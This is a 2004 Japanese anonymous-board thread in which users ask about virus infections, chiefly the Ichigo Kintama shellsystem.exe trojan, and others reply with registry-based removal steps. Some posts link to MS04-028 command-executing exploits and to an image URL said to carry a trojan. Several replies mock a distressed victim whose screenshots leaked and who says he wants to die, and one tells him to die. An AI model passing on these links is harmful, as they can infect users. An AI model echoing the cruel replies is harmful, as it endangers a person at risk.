もともとは併用ではなかったのです。
少しずつパフォーマンスが低下しているネットワークに異変を感じて
シマンテックのオンラインスキャンを試していたら、そのうちにネットワークが完全に死亡。
AVGでスキャンしても異常なし。
シマンテックのスキャンの途中経過に感染ファイルがいくつかピックアップされていたので
これではいけない、と別マシンで体験版をDLし、死亡機にインスコ。
感染ファイル発見→削除→直んねぇ・・・。
という経緯だったのです。

重要な更新はDLしてインスコする設定になっていました。
そのほかに月に一回、ということです。
書き方が悪かったですね、もうしわけありません。
セーフモードでのスキャン、アンチトロイ、試してみます。ありがとうございます。

>>547氏
ZAは以前より導入していましたし、試しにZAを終了させても事態が変わらなかったので
おそらくZAは原因ではないと思います。
ただ、一分おきにincomingに対してブロックしているという状況は
いささか異常なのではないかと思って書き添えました。
ファイルは(出先なので記憶があいまいですが)256バイトだったように思います。ログにしては小さいです。
ともあれ、ありがとうございます。

質問します。
w2kで、あるソフトを起動、うまく動かないので、再起動。
英語のメッセージが出てエラー。
ファイルだけでも救出しようと、もう１台のパソコンにその起動HDDを接続し
起動させると、そのパソコンの「ページファイルがありません・・・」で動かず
そのHDをはずしても、そのパソコンまでまともに動かない。
接続、データードライブとして起動しただけで、感染するウイルスってあるのですか？
また、その対策は！？（他人のパソコンまでまきぞいにしてしまい、悲しいです・・・）
m(_ _)m

WindowsMeを使っています。
急に再起動を繰り返し困っています
ウイルスだと思うのですが何かわかりません。
駆除方法はないのでしょうか？
どなたか助けて下さい・・・

>>555
>WindowsMeを使っています。
捨てろ。

>急に再起動を繰り返し困っています
へぇ〜

>ウイルスだと思うのですが何かわかりません。
ｱﾝﾁｳｨﾙｽｿﾌﾄ使えよ。

>駆除方法はないのでしょうか？
何を駆除するんだよ。

>どなたか助けて下さい・・・
そりゃ無理だって。

ｴｽﾊﾟｰさん出番ですよ！

ウイルス駆除ソフトは入れていました。
大切なものが入っているので再インスト−ルはどうしても避けたいです・・・

もうどうしたら良いのかわかりません

今となっては遅いのですが
バックアップとっていませんでした

>>555
再インストール

>>553
元々併用じゃなかろうが、今の時点で併用してちゃダメなの。
どうしてもノートンでスキャンしたいなら、オンラインスキャン使え。

>>554-555
どんなメッセージが出るのかもわからないし、もしかしてBIOSがぶっ壊れたんじゃねーのか？
ウィルス駆除ソフトは何いれてたかもわからないし、リカバリしろとしか言いようが無い
もっときちんと症状を書け

方法1　デスクトップ型等ハードディスクが二台つけれるPCの場合

　感染したHDDを取り外す
　もう一台HDDを買って取り付けシステム再インストール&アンチウィルスソフト導入
　感染したHDDをスレーブとして取り付ける
　ウィルス駆除


方法2　ノートPC等のハードディスクが二台つけれないがLANが使えるPCで
　　　　　なおかつもう一台LANが使えるPCがある場合

　FD-Sambaを入れたフロッピーディスクを作る(作り方はFD-SambaでGoogle)
　感染したPCをFD-Sambaを入れたフロッピーディスクで起動
　感染したPCもう一台のPCとLANで接続
　大切なデータをコピー

方法3　CD起動が出来るPCである

　ttp://www.jtc-i.co.jp/avast/avast10-bart.htm
　avast! BARD CD（アバスト　バートCD　七万二千円）を購入してウィルスを駆除する
　ttp://www.jtc-i.co.jp/avast/avast00-top.htm

560さんへ
ありがとうございます。
初心者なので何がなんなのかわかりません。すみません。
わかったら報告します。

561さんへ
ありがとうございます。試してみます！！

ユーザー名の完全な変更の仕方教えてください
WINXPです

>>563
再インストール

画面に全体に急に血飛沫が出てきたんですけど、これってウイルス？

>>565
ジョークソフトで似たようなのがあったな
スタートアップとかに変なexeないか？

>>566
確かにジョークソフトでもあるんだが、ｷﾝﾀﾏの症状でもあるんだよなぁ・・・。
「致死武器」

>>563
「XP　ユーザー名　変更」でググれ。苺？

>>482
俺も最新アップデート後、全検索したらSVKP.sysにBKDR_SURILA.Bが検出された。
しかし、不自然なのは検出ファイルがSVKP.sysしかないことだ。
SVKP.sysをコピーする他のウイルスの解説を読んでも、SVKP.sys自体はAntiCrackingが
提供するSVK Protectorの正規コンポーネントで、害の無いプログラムも利用しているとあり
ファイルサイズも同じだった。
また居昇殿起動時にリアルタイム検索に反応すること、SVKP.sysの更新日時は居昇殿を
インストールしたときと重なることから、居昇殿がソフトウェア保護のためにSVKPサービス
を利用しているだけで、今回は誤検出であると俺は予想というか期待している。
一応TrendMicroにウイルス検体としてSVKP.sysを送り返事を待っているところだ。
1営業日経過したが返事はこない。返事は来週になりそうだ。

>>541
直したいなら始めからそう言えばいいのに。
2kの場合「システム修復プロセス」でレジストリの修復ができるらしい。
詳しい方法は、ググればわかるよ。

ttp://www.gamania.co.jp/kd/news/news_mainte_detail.asp?newsid=624
居昇殿の公式サイトに載ってた。やはり無問題っぽい。
今のところSVKP.sysの隔離を解除し、リアルタイム検索でSVKP.sysを検索対象外に登録
することで問題なく動作している。

正しくは巨商伝か。どーりでみつからん訳だ。

自分は巨匠伝も、TWもまったく触れてないのにSURILA.Bに感染してました・・・
なにをしているトロイなのか分からずとても不安なので、解説出るまで回線つなげない事にします。
来週には駆除できるといいなぁ

shellsystem.exe発見したんですが削除できません
教えてくれませんか？

>>573
[対処法]
(1)マイコンピュータを開き、Cドライブ→WINDOWSフォルダを開く
(2)検索ボタンを押してファイルとフォルダすべてからshellsystem.exeを検索
(3)検索結果に引っかかったならば削除

(4)スタートメニューの[ファイル名を指定して実行]を選びregeditと入力
(5)HKEY_USERS → .Default → Software → Microsoft
　　→ Windows → CurrentVersion → Run
　　と選んでいく
(6)shellsystem.exe :='C:\Windows\shellsystem.exe'というキーを削除

(7)HKEY_CURRENT_USER → Software → Microsoft
　　→ Windows → CurrentVersion → Run
　　と選んでいく
(8)shellsystem.exe :='C:\Windows\shellsystem.exe'というキーを削除

[情報]
追加されるファイル：
windows\shellsystem.exe 678kB

追加されるレジストリ：
HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'

>>574をセーフモードで行う。

すいません
セーフモードってどうやってやるんですか？
全然わからないのです

>>576
OSは？

ＸＰです

>>578
PC再起動時にF8連打

わかりました
やってみます
再起動のときずっと連打してればいいんですか？

>>580
そうそう。

ありがとうございました
もしできなければよろしくお願いします；

ほんっとごめんなさいなんですけど
(6)shellsystem.exe :='C:\Windows\shellsystem.exe'というキーを削除
はｒｕｎの中にあるのでしょうか
それがないんですけど・・・

>>581
おかげさまで消せる事ができました！
ありがとうございました！

>>584
あぁ、Runにあったんだ。まずは良かった。

とりあえずID出ない板では名前に番号でも入れて誰だか区別できるようにしようね

苺の元種ってどっかで手に入らないかなぁ

>>574さん
（5）のやり方で、「Run」の中に「ctfmon.exe(REG_SZ)」がありました。
これは削除すべきですか？

（7）の「Windows」の中に「Shell」と「ShellNoroam」があるのですが、
これはshellsystemと関連があるのでしょうか？削除すべきですか？

また、（7）の「current version」の中に「Shell Extensions」があるのですが、
これもshellsystemと関連があるのでしょうか？削除すべきですか？


ちなみに、（5）（7）の「Run」の中には「shellsystem.exe」のファイルはありません。
タスクマネージャーの中でそのファイルが機能していないので、
問題はないかと思いますが、少し不安です。

>>588ですが、ちょい訂正。

shellsystem.exeを削除したので、
タスクマネージャーの中にはなく、処理速度は通常に戻っています。
なので、問題はないかと思いますが、少し不安です。

ちなみに、「HijackThis」で「shellsystem」の部分は削除しました。

質問しまくりだな
少しは自分で調べようとする気はないのか？
てゆうか、おまい誰よ？

>>589
今クグってきました。どうやらどれも問題ないようです。
すんません、勝ってに騒いで迷惑かけて。

みなさん、ご迷惑おかけしました。541のBKDR_SURILA.Bの件のものです。
私の結論は判明しました。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_SURILA.B&VSect=T
まったくの一人芝居みたいになり、皆を巻き込み恥ずかしい限りです。
>>549
ほんと、希少な情報を色々調べてもらいありがとうございました。
>>568　>>570
その通りでした。
>>569
欲張ってあれこれ聞いては、皆の迷惑と思って^^;;しかし、今にな
ってはシステムの回復が最大ネックです。がんばります。
>>572
いきさつは、私程度にはわかりませんが、がんばってください。

ということで、とあるゲームのプログラム中に不正でなく使われただけ
で、私が勘違いしてレジストリいじりまくったのがまずかっただけにな
りました。現在、M社オフィスのインストローラーが働かない、メールが
送信できない、起動が少し遅いが（一応ウイルスはないようです）が
課題になりました。これはスレ違いなので、ここでのアドヴァイスは
遠慮しますね。（ヒントもいただきました）皆さん本当にありがとうござ
いました。

LiveUpdateでUpchan来てる？
そろそろ来ないと被害者数が凄いことになりそうなんだが

>>593
LiveUpdateでの対応は9月29日(水)予定らしい。
すぐに対応したい場合は下のサイトからなら初期のUpchanのみ対応できる。
亜種のcontig.txt.......exeなどは対応してないようだ。

Security Response
http://www.symantec.com/region/jp/sarcj/download/jp/JP-N95.html

>>589
HijackThisで消してるじゃん

すいませんSURILA.B関連の話なのですが、、、

このスレッドを読んで、SURILAを駆除しようとpandaのオンラインスキャンをしたんです。
それから>>505、>>513を読んで驚いてしましました。
この話は本当で、だとしたらpandaからもらったウイルスはどう駆除できるのでしょうか？
トレンドマイクロオンラインスキャンをしてみたら検出はされなかったのですが。

ちょっと質問よいだろうか紳士諸兄。
最近巷で噂の苺きんたま。

気になったので一応自分のＰＣも調べてみて
全ファイル検索とタスクマネージャでは
sugoimonoss.comもshellsystem.exeもみつからなかったのだが
レジストリエディエタを検索してみたら
search Assistantというところに
種類　REG_SZ　データ　shellsystem.exeというのが出てきたので…
これは一体…？


あと、念のためこのトロイが潜むのはc:\windows直下ということで間違ってない？

>>597
OS再インストすれば、消えるよ(*^ーﾟ)b

500 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：04/09/25(土) 21:41:05 ID:HKA4Ue+e
C:\WINDOWS\〜でファイルの参照したら

$NtUninstallKB821557$
$NtUninstallQ810565$
$NtUninstallKB839643-DirectX9$

こんなのが青字でいっぱい出てきたんだけど何？
(((( ；ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

つー質問があって、レスにそれウイルスの残すファイルだ〜ってあったんだが
本当？
$NtUninstallKB839643-DirectX9$があってさ、でもこれDirectX９入れたせいだと思うんだが・・
それにWindows Update 後にできるフォルダじゃなかったっけ？

もしかして俺釣られた？

>>597
それ、検索したときの履歴がレジストリに残ってるだけだろ。
c:\windows直下で間違いない・・・はず。

>>599
ん？

コンピュータウィルス総合スレッド VOL.41
http://pc6.2ch.net/test/read.cgi/pcqa/1095335861/263

で質問したのとは別人？

>600
うん
500の質問に自信満々にレスしてたから
500に大丈夫と言っていいのか
俺の記憶違い(Windows Update 後にできるフォルダ)だったのか不安になっちゃってさ

で、質問板で聞けって500の人も言われてたから、一応「質問」で出たすれを検索してみたけど
聞いてないみたいだったんで被ってないと思って聞いてみた次第です
マルチみたいになって申し訳ないっす

再インストって再セットアップとは違う？

>>602
同じです

俺も質問！　　ＰＣ立ち上げてネットにつなぐと
「表示出来ない・・・」　つーのが延々と出てくる・・・・
なんだこりゃ？？

ttp://homepage1.nifty.com/airmail/news_diary.htm
↑
9/22のところ

「マイドキュメント」が
「マイドキュソメント」に
いつの間にか書き換えられてました・・・

そんなウイルスってございます？

>>606
考えられるのは、ぬるぽだとか２ｃｈねらーのウィルスだな
どうせWinnyやってたか、アプロダから変なもんDLしたんだろ
ご愁傷様、バカな自分を恨んでください

掲示板に故意にウイルスへのリンクを貼り付けたら犯罪になりませんか？

ウィルス：BKDR_SURILAB
感染ファイル：C\WINDOWS\system32\SVKP.sys

と、トレンドマイクロのオンラインスキャンがおっしゃってるのですが
データベースにありません…感染ファイル消そうかと思ったけど、なんかヤバげなファイルだし、どうしましょう

>>609
お前がスペルミスしてるだけ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_SURILA.B

ウイルスに感染したらタスクに表示されますよね？

ノートンでチェックしたら４つほど修復できないファイルが見つかり
検疫はできたのですが、この検疫ってのをした状態で放っておいて大丈夫ですか？

ウイルス名は
・BloodhoundExploit.6　（←×2）
・Trojanhorse　（←×2）

>>611
タスクに表示されないものもあるよ

>>612
シマンテックのウィルスデータベース見て、手動駆除しなさい

苺きんたまウィルスにかかったようです
まとめｻｲﾄを参考にファイルを削除したのですが
削除したとたんフリーズしてしまいます
再起動するとパソコンのデータが消えてしまいます
どのアイコンをクリックしても動きません
再起動、終了を10回ほど繰り返すと元に戻ります
で、検索すると削除したはずのshellsystem.exeがまたあります
どうすればいいですか？

>>614
やましいファイルを落としたあなたがバカなだけです
ネット接続を切断して、セーフモードで除去してみろ
どうせレジストリも残ってるんだろうから、ちゃんと見て駆除しなさい

>>614
フォーマット
どうせ知識不足だろ

>>615
難しすぎて何をいってるのかわかりません

あぼーん

>>617
わからないなら再インストールしろ

>617
つーかさ615に書いてるのって初心者向け雑誌にすら書いてる様な事だぞ
ネット接続を切断、セーフモード、レジストリ
きつい様だがこれぐらいは最低限必要な知識と思う

セーフモードの入り方は買ったPCの説明書にも書いてるだろうからそれ参考に
再インストールするなら説明書みるなり、ネットで検索かけるなりで

すいません、質問させてください。
症状ですが、家に帰ってきてパソコンを立ち上げたら画面が青くなってました。
一応ノートンとアドウェアでチェックしスパイウェアは削除したのですが・・・
直らないので改善方法を教えていただけると助かります。

>>621
「青くなってました」じゃ、ブルースクリーンなのかスパイウェアなのかもわからない
それじゃ回答しようがない

>>621
トマトが赤くなると医者が青くなると昔からいわれています。

う、すいません。
えっと、全体的に青みがかっている感じです。
文字を見たり書いたりすることは可能な状態です。

ん？　モニターがいかれたって可能性は？

モニター自体のメニューを開くと普通に表示されるので、モニターは正常だと思うのですが・・・

>>626
ブラウン管？
画面が焼きついたとかｗ
液晶ならありえないけど

>>621
おまいもまずここ行ってこい
ttp://myu.daa.jp/osiete/index.html

>>623
リンゴじゃなかったか？

>>617
F8キーを押しながら起動

えっと、解決しました。
原因はディスプレイにあったみたいで、
物置においてあったディスプレイにつないだらくっきり・・・・
こんなへたれの質問に答えて頂きありがとうございました。

質問者は>>85or>>86の質問テンプレ使うと
回答者もわかりやすく、回答もつきやすい・・・かも。

では、次の方ドゾー↓

>>629
トマトです、ヨーロッパのことわざ

an apple a day keeps doctor away

>>614です
セーフモードで削除してみましたが
再起動したらまた復活してました
どうすればいいですか？
>>574の方法も全部しましたけど再起動したら復活してました
どうすればいいですか？

>>635
もしかして、ＯＨ〜〜〜ＹＥＳ！！は　Ｍｅ　ですか？

>>635
システムの復元を無効にしてみた？

>>635
あんたじゃ無理　悲しいけど、フォーマットする

http://213.159.117.134/index.php
ってサイトにつながって、ホームページかえられなくなりました。
どうすればいいんですか。。。。？

>>639
エロサイト見たら…助けて下さい！Part41
http://pc6.2ch.net/test/read.cgi/pcqa/1095834281/

テンプレ実行せずに質問するとボコボコにされるから、ちゃんとテンプレ読めよ

Bloodhound.Exploit.13

ファイルを分析しました。
送られたそれぞれのファイルについてわかったことを以下に報告します。
ファイル名: CRASH-TEST.RenameToJPG
結果: デベロッパーノートを参照してください。
ファイル名: poc_poc.jpg
結果: デベロッパーノートを参照してください。
デベロッパーノート
:
CRASH-TEST.RenameToJPG This is a proof-of-concept program that does not contain
any malicious payload. You can delete it safely.
Poc_poc.jpg This is a proof-of-concept program that does not contain any malicious payload.
You can delete it safely.
このファイルにウィルスがいると判断しましたが、特に問題はありません。
詳しくはデベロッパーノートをご覧ください。

（Ｃ）2004 シマンテック・セキュリティ・レスポンス
（P）2004 シマンテック・セキュリティ・レスポンス

セキュリティホール memo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/


http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2004/09.html#20040916_MS04-028
発見者による解説
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/full-disclosure/2004.09/msg00515.html
crash する exploit
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2004.09/msg00206.html
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/full-disclosure/2004.09/msg00523.html
コマンドを実行するexploit が登場
http://www.k-otik.com/exploits/09222004.ms04-28.sh.php
http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
http://www.k-otik.com/exploits/09232004.ms04-28-admin.sh.php
http://d.hatena.ne.jp/hideakii/20040924#1096004636

すみません、ルータに感染するウイルスはあるのでしょうか？

また、一つのルータで、一本のＬＡＮケーブルを二つのパソコンに交互に
繋いだ時、片方のパソコンがウイルスに感染していた場合、それに
さしていたＬＡＮケーブルをぬき、別のパソコンに繋いだ時、
そのパソコンも感染してしまうのでしょうか？

どうかよろしくお願いします。

質問です。

3年前に買ったVAIOなんですが前に入れておいたウィルス対策ソフトの
期限が切れたので早速買ってきた対策ソフト(SOURCENEXTウィルスセキュリティ2005)
を入れてみたんですが、ソフトの指示に従い再起動後、CDドライブが認識されなくなってしまい、
インターネットにも接続できない状態です。しかも入れたはずの対策ソフトが見当たりません。
今はサブPCから書き込みしています。何かアドバイスを頂けないでしょうか・・・

>>644
コッチの方がいいかも・・・

【ｿｰｽﾈｸｽﾄ】ウイルスセキュリティ2005 Part9【K7】
http://pc5.2ch.net/test/read.cgi/sec/1095983778/l50

スレの雰囲気は、読んでないからしらん。

>>644
うは、ご愁傷様でした
そっちのスレ見ればわかるけど、不具合満載ソフトだよ
フリーソフトの方がまだマシだという糞フト
授業料だと思って諦めるといいと思うよ

>>646
人を誘導しといて言うのもなんだが、テンプレ段階でﾜﾛﾃしもた。
なんか、今後目が離せないスレになったよｗ

此処も
ウィルス　落としています

逮捕してください
homepage3.nifty.com/shiofuki/

>>648
逮捕はK察のお仕事。迷惑したならniftyに文句を言ってくらはい。

>>645>>646
レスthxです。

ウィルスセキュリティ2005を入れる前にもPCがいきなり再起動したりすることがあったのでウィルスの可能性もあるかと思いここに書き込んでみたんですが・・・
ちなみに今はセーフモードでしか動かせないです。
こんな症状のウィルスって無いんですかね・・・

苺きんたまの事で、お願いします
よくわからない物がレジストリに表示されるんです。
感染しているかどうか不明だったので、Cドライブにshellsystem.exeがないか
検索しましたが、ありませんでした。それからregeditを開いて
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
を見ましたが、こちらにもありませんでした。ですが、
regeditで更にshellsystemを検索したところ、
shellsystemとshellsystem.exeがありました。
001"shellsystem"みたいな感じで…（この番号ははっきり覚えてません）。
セーフモードで起動してregeditでshellsystemを検索すると
やはり　000"shellsystem"と出ます。
下のステータスバーのところには、
マイコンピュータ\HKEY_USERS\.DEFAULT\Software\Microsoft\InternetExplorer\
Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU
とあります。普通に起動していた時も、検索結果でExplorer Bars…というのが見えました。
このregeditでの検索結果のshellsystemとshellsystem.exeが
何度削除しても復活しているんです。
該当ファイルはなかったんですが、やっぱり感染してたんでしょうか。
それと、どうすれば消えるんでしょうか…
長くてすみません。

>>651
>このregeditでの検索結果のshellsystemとshellsystem.exeが
>何度削除しても復活しているんです。

レジストリの値を消したって意味？

000にshellsystem、001にshellsystem.exeとあったので
000と001を右クリックして、そのまま削除を選んだのですが…

今再起動してみたら、この二つは消えていました。
というより、000と001が消えていました。
これってもしかしてまずいんでしょうか？

ttp://www.cty-net.ne.jp/~taitiro/imgboard/data/img20040825044524.jpg
一応ウィルス付きみたいだけど、Norton 付きでこれ踏んだ後スキャンしたら
Documents and Settings\*****i\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\
にTrojan.ByteVerifyが検出された。Nortonで 削除されたなら大丈夫かな？

>>654
ば〜〜〜〜〜〜〜か
ＵＲＬ貼ってんじゃネ〜ヨ

>>653
よいよい。それで、おっけー。

>>654
直リンじゃないから、いいんでないか？と思いつつ、
トロイの方はノートン先生で大丈夫と思うが、そういう
とこいってるとなると、スパイウエアあたりにやられて
そうな希ガス。
エロサイト見たら…助けて下さい！Part41
http://pc6.2ch.net/test/read.cgi/pcqa/1095834281/l50
テンプレ４のAd-awareSEとSpybotS&Dで再チェックを
お勧めしマフ。

virus bulletinみたいな評価サイトで
最近の評価が載ってるサイトありませんか

>652
ありがとう。安心して眠れそうです。

レスを頂くまで自力で調べてみてました。
〜Explorer Barsにあったshellsystemは、自分のOSの中身を検索したから
それが出てきた…という事なのでしょうか。感染もしていなかったみたいで、ほっとしました。

>>655
スマンかった。

>>656
いや、普段こういうとこは見てない。直リンではまった。（バカ
でもAd-awareでスキャンしといた。サンクス。

>>658
http://www.geocities.jp/ichigo_kintama/

こっちのほうが早い
亜種注意

つか、>>651をよく見ればただの検索履歴ではないか

>>654
このへん４どけ
ttp://java.com/en/download/help/cache_virus.jsp

間違えた。>>660＝>>661

一度検出されたウィルス（トロイ）が検出されなくなったら
駆除されたと考えていいんですかね？
今日トロイ付きのリンクを踏んでしまいました。
そのあとシマンテックのオンラインスキャンを実行した結果トロイが検出されました。
その後自分のパソコンにインストールされているノートン（定義は半年前に期限切れ）で
スキャンし、感染：１、駆除済み：１と出ました。
その後もう一度シマンテックでオンラインスキャンしたんですが何も検出されませんでした。
念のためウィルスバスターも試しましたが何も検出されませんでした。
これは大丈夫なのでしょうか？お願いします。

教えてください。
見事に苺きんたまにかかってしまったのですが、winnyをもっていなければ
デスクトップ画像がアップされないのでしょうか？

>>665
大丈夫(^Д^)

>>666
ありがとうございます。
やたらと、shellsystem　error というのが出てくるので
何かと思って検索したら苺きんたまでした。
このエラーが、つまり、winnyをもってないために
アップできなかったというエラーだったんでしょうか？

>>665
コレに関しては、nyは全然関係ないで〜す。
トロイ自体がうｐ&スレ爆撃しまーす。

>>666
こらこら、この悪魔ｗ

>>664
シマンテック&トレンドマイクロ以上の知識と技術を
持ってる個人はそうそういませんよ〜。

>>668

なにー！じゃあ、既にアップされたかもしれないのか・・・。
どこかで確認とかは出来ないんですよね？

>>662
サンクス。最初は Java SDK を誤認したのかとｵﾓﾀ。

>>669
うｐ先は以下のとおりで〜す。

画像の一覧はこちら。重いけどリロード禁止！！5分くらいまてば表示される。
5分まっても表示されないやつは他の人の接続の邪魔になるからあきらめろ。
http://up.isp.2ch.net/upload/c=03okari/index.cgi

祭はこのあたりで〜す。（実況も同じ板でやってまーす）
【ﾏﾀｰﾘ】苺きんたま監視所のまとめ＆雑談ぱーと2
http://sakura02.bbspink.com/test/read.cgi/erolive/1096190772/l50

だめだ。うぷされてた。
本気で死にたい。

>>672
いきろｗ

|・_・）....

>>672
(･∀･)ｺﾝﾆﾁﾊ!!

>>672
ｨ�`

まとめサイト
　　ttp://www.geocities.jp/ichigo_kintama/
　苺きんたま監視所パート72
http://sakura02.bbspink.com/test/read.cgi/erolive/1096215700/
ここもね

>>672
ふぁいと、だよっ(つД｀)

記念

>>672
ガンバレ！！

>>672
記念に名前をどうぞ

>>672
哀れｗｗｗｗｗｗｗｗｗｗｗｗｗ

寿司より早く

>>672
寿司でも食え

>>672
次はいいことあるさ

>>665
どれどれ？？？おせーてー、ついでに

　　　　　　,-――――――-.
　　　　　 /　　　　　　　　　　 |
　　　　　/　　　　　　　　　　　|
　　　　 /　 　　　　　　　　　　 |
　　　　l"ジェンキン寿司　　　l
　　 ,､_lー-―――――‐--、/l
　　 i ﾄ､ﾐﾐ　,r‐- ､｀`'ニ=‐、.彡ﾘ.
　　 ヾ,iﾊ゛.´ _,,､_ 　i.;　_,.　｀ 彡'i)
　　　 ｀､j,'　 `ﾟ''´:.ﾉ i::<･ゝ) .ﾊン 　　　　　　へいらっしゃい!!
　　　　　i, 　 ｀ ,､/　i_　｀`　,r'
　　　,r〃'i　 ,r'ヽ、 _,〉　　/.
　　 /i:ﾄ､;;i, 　ﾐ=_‐_-, 'i　/ヽ__
r-‐'´i::::ﾊ;;ヾ、‐‐-､　 ノ´/i:::'i｀i‐- ､_
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i､ 'i::!　i::::i　｀
:i'　i:|　!:::l _,r.､;;;;;,r''´ヽi. ll::i　i::i　l:::'i

ノートンはLiveUpdateしても29日までだえめですのでご注意を
今のところ自動で対応できてるアンチウイルスソフトはありません

>>672
　　　　　　,-――――――-.
　　　　　 /　　　　　　　　　　 |
　　　　　/　　　　　　　　　　　|
　　　　 /　 　　　　　　　　　　 |
　　　　l"ジェンキン 寿司　　　l
　　 ,､_lー-―――――‐--、/l
　　 i ﾄ､ﾐﾐ　,r‐- ､｀`'ニ=‐、.彡ﾘ.
　　 ヾ,iﾊ゛.´ _,,､_ 　i.;　_,.　｀ 彡'i)
　　　 ｀､j,'　 `ﾟ''´:.ﾉ i::<･ゝ) .ﾊン 　　　　　　へいらっしゃい!!
　　　　　i, 　 ｀ ,､/　i_　｀`　,r'
　　　,r〃'i　 ,r'ヽ、 _,〉　　/.
　　 /i:ﾄ､;;i, 　ﾐ=_‐_-, 'i　/ヽ__
r-‐'´i::::ﾊ;;ヾ、‐‐-､　 ノ´/i:::'i｀i‐- ､_
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i､ 'i::!　i::::i　｀
:i'　i:|　!:::l _,r.､;;;;;,r''´ヽi. ll::i　i::i　l:::'i

>>672
どんまいでーす（＾o＾）/

寿司の出前がきますよ、

ジェンキン寿司
ここ違うｗ

イイ事あるさｗ

＼ 　 　 ､　m'''',ヾﾐ､､ ／ 　　
　　＼､_,r Y　 Y ' ､ ／';,'' 　　　
　　､ ,＼ヽ, |　| y ／､ ,;;,,'', 　
　　 ＼､＼::::::::::／, ／,, ;;, 　　　
　　 ヽ＼ o ､　,o ／ { ;;;;;;;,, 　　　 　　
　　 丿 [ ＼|:::|／ ]　 >"''''' 　 ＜ｶﾞﾘ
　　 ＞､.> 　U 　 <,.＜ 　　　　　　　　　　
　　ﾉ　 ! !　-=-　ﾉ! 　ﾄ-､ 　　　　　　
..''"L　 ＼＼.".／／_ | 　 ﾞ` ]

>>672
がんばれよ

>>672
ちゃんと駆除しとかないとずっと晒されてるぞ。
対処しとけ。

記念カキコ

おまえらｗ

出前乙
あと>>672　がんがれ

>>672
自分で対処出来ないようならしばらくネットするな

＼ 　 　 ､　m'''',ヾﾐ､､ ／ 　　
　　＼､_,r Y　 Y ' ､ ／';,'' 　　　
　　､ ,＼ヽ, |　| y ／､ ,;;,,'', 　
　　 ＼､＼::::::::::／, ／,, ;;, 　　　
　　 ヽ＼ o ､　,o ／ { ;;;;;;;,, 　　　
　　 丿 [ ＼|:::|／ ]　 >"''''' 　　＜ガリで。
　　 ＞､.> 　U 　 <,.＜ 　　　　　　　
　　ﾉ　 ! !　-=-　ﾉ! 　ﾄ-､ 　　　　　　
..''"L　 ＼＼.".／／_ | 　 ﾞ` ]

>>672
ありゃ〜。でもイキテくさださーい。
わたしには、それしか言う言葉がありませんです・・・。

つーか、おまいら反応早すぎ。でも、励ましてるからよし。

おやじ、ガリ！

>>672
ヤフーで「exe　ファイル　捨てたい」で検索するんだ！

>>672
おちんちんを高速でしごくんだ！

まだyahooのトップページくらいならいいけどさ、
個人情報とかはやばいよな・・・・

しかも相当恥ずかしいヤツを・・・。
何もかも割れてるし、知り合いが見てないことを祈るだけだ。
何回もアップされてたみたいだし、過去の２ｃｈの苺きんたまスレで
自分の画像がアップされてるのも見た。
さっきから何も手につかなくて、部屋の中うろうろしてる。
さっきまでお腹がすいていたはずなのに、そんなことどうでも良くなってる。
まるで部屋の中に隠しカメラがあって、トイレからオナニーまで覗かれた気分だ。

　　　　　　,-――――――-.
　　　　　 /　　　　　　　　　　 |
　　　　　/　　　　　　　　　　　|
　　　　 /　 　　　　　　　　　　 |
　　　　l"ジェンキン寿司　　　l
　　 ,､_lー-―――――‐--、/l
　　 i ﾄ､ﾐﾐ　,r‐- ､｀`'ニ=‐、.彡ﾘ.
　　 ヾ,iﾊ゛.´ _,,､_ 　i.;　_,.　｀ 彡'i)
　　　 ｀､j,'　 `ﾟ''´:.ﾉ i::<･ゝ) .ﾊン 　　　　　　>>702へいっ!!!がりおまちっ!!!
　　　　　i, 　 ｀ ,､/　i_　｀`　,r' 　　　　　　　　　そろそろ巣に帰るぞ
　　　,r〃'i　 ,r'ヽ、 _,〉　　/.
　　 /i:ﾄ､;;i, 　ﾐ=_‐_-, 'i　/ヽ__
r-‐'´i::::ﾊ;;ヾ、‐‐-､　 ノ´/i:::'i｀i‐- ､_
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i､ 'i::!　i::::i　｀
:i'　i:|　!:::l _,r.､;;;;;,r''´ヽi. ll::i　i::i　l:::'i

なんかネタ臭いな

この調子で感染者の見てる先
いろんなところに爆撃されてます

>>672
お前は本当にすべてを捨てれるんだろうな？

>>707
いいショウガ使ってるねー！
巣に帰るよ。

吐きそう

>>706
ネタ90％
嘘はもうちょっとうまくやろうな。

泣きそう

>>665
それより直したかぁ？
そうでないとここで見てる画像がアップされて二重に祭りになるぞ

自分の名前を見てるスレで発見したところのキャプチャという
笑えない画像がたくさん生み出されてるぞ

嘘だったらどんなに嬉しいか。
変なexeファイルを開いた瞬間に気付くべきだった。
もう外にも出たくない。本当に死にたい。

>>716
(　´_ゝ｀)ﾌｰﾝ

>>716
下手に騒がなければ一時的なネタとして流れるから安心しる！

>>716
落ち込む気持ちも分かるが
まずは対応しろ
このままだとマズイだろ

>>716
死ぬ気になれば何だって出来るさ
まとめサイト読むなり
ノー�d手動でアップデートするなりｶﾞﾝｶﾞﾚ

>>716
市ね

>>716
変なexe開いた瞬間にPCがあぼーんしなくてよかったな

>>716
個人情報が流れてない限りは早く駆除しとけ

とりあえずShellSystem.exe消して再起動しる

>>714
安心しろ
お前のデスクトップのSSがどれかは分からないが
この2日以内にうpされたのなら確実に保存している

俺と会ってみろ。
お前を救えるかもしれない。

>>716
宇宙ヤバイ
まじ広い

>>716
自己責任だバカやろう

げ、もう3時かよ！

てかこのスレ自演できるじゃねえか

>>723
